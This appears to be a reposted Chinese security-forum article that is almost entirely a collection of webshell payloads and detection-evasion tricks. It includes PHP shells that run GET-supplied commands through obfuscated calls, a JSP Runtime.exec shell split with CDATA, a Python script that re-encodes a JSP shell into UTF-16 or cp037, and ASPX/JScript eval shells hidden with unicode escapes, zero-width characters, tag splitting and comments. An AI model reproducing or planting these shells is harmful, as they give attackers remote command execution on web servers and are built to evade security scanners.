文章来源:先知社区(Icepaper)
原文地址:https://xz.aliyun.com/t/10937
<?=
$a=<<< aa
assasssasssasssasssasssasssasssasssasssasssassss
aa;echo `whoami`
?>
<?php
\echo `whoami`;?>
<?php
$s=substr("aabbccsystem","0x6");
$s(whoami)
?>
<?php
$a = $_GET['function'] ?? 'whoami';
$b = $_GET['cmd'] ?? 'whoami';
$a(null.(null.$b));
格式:<![CDATA[xxxxxxxxxxxxxxxxxxx]]>
例如:String cmd = request.getPar<![CDATA[ameter]]>("shell");
if (cmd !=null){
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
#python2
charset = "utf-8"
data = '''<%Runtime.getRuntime().exec(request.getParameter("i"));%>'''.format(charset=charset)
f16be = open('utf-16be.jsp','wb')
f16be.write('<%@ page contentType="charset=utf-16be" %>')
f16be.write(data.encode('utf-16be'))
f16le = open('utf-16le.jsp','wb')
f16le.write('<jsp:directive.page contentType="charset=utf-16le"/>')
f16le.write(data.encode('utf-16le'))
fcp037 = open('cp037.jsp','wb')
fcp037.write(data.encode('cp037'))
fcp037.write('<%@ page contentType="charset=cp037"/>')
unicode编码
空字符串连接
<%%>截断
头部替换
特殊符号@
注释
<%@ Page Language="Jscript"%>eval(@Request.Item["pass"],"unsafe");%
<%@ Page Language="Jscript"%><%\u0065\u0076\u0061\u006c(@Request.Item["pass"],"unsafe");%>
\u200c
\u200d
\u200e
\u200f
<%@Page Language=JS%><%eval%><%(Request.%><%Item["pass"],"unsafe");%>
<%@ Page Language="Jscript"%>------》<%@Page Language=JS%>
(Context.Session["payload"] == null)
(@Context.@Session["payload"] == null)
<%/*qi*/Session./*qi*/Add(@"k"/*qi*/,/*qi*/"e45e329feb5d925b"/*qi*/)
学习更多技术,关注我: